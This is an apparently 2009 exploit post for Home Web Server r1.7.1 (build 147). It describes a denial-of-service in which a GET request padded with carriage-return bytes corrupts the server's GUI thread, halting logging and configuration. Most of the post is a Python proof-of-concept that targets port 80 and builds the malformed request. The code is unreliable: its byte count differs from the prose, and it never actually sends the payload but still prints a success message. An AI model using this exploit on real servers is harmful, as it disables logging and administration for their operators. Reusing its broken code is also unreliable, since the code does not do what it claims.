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Home Web Server <= r1.7.1 (build 147) Gui Thread-Memory Corruption
来源:f3arm3d3ar@gmail.com 作者:Aodrulez 发布时间:2009-04-24  

  Home Web Server <=r1.7.1 (build 147) "Gui Thread-Memory Corruption Exploit." By: Aodrulez.

Homepage         : http://downstairs.dnsalias.net/homewebserver.html
Product Released : 22.4.2009/21:16:58

 This web server when fed with
1006 bytes of chr(0x0d),with the html
"GET" parameter,the Server's Gui's
Thread gets corrupted.This means,
though the web server works normally,
(due to Multithreading),No more Logs
are generated.Also "all" the web server
configuration settings are unavailable.

Exploit (Python):
# Echo client program
import socket

HOST = 'localhost'    # The remote host
pORT = 80           # The same port as used by the server
print '####################################'
print '#Home Web Server r1.7.1 (build 147)#'
print '#  Gui Thread Corruption Exploit   #'
print '#                                  #'
print '#          By: Aodrulez            #'
print '#       f3arm3d3ar@gmail.com       #'
print '#                                  #'
print '####################################'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, pORT))
p='GET '+chr(0x0d)*1001+'index.html HTTp/1.0\r\n\r\n'
print '\"'+HOST+'\'s Gui Got Corrupted :P\"     '

Greetz Fly out to:
1] Amforked()      : My Mentor.
2] The Blue Genius : :-)
3] www.OrchidSeven.com

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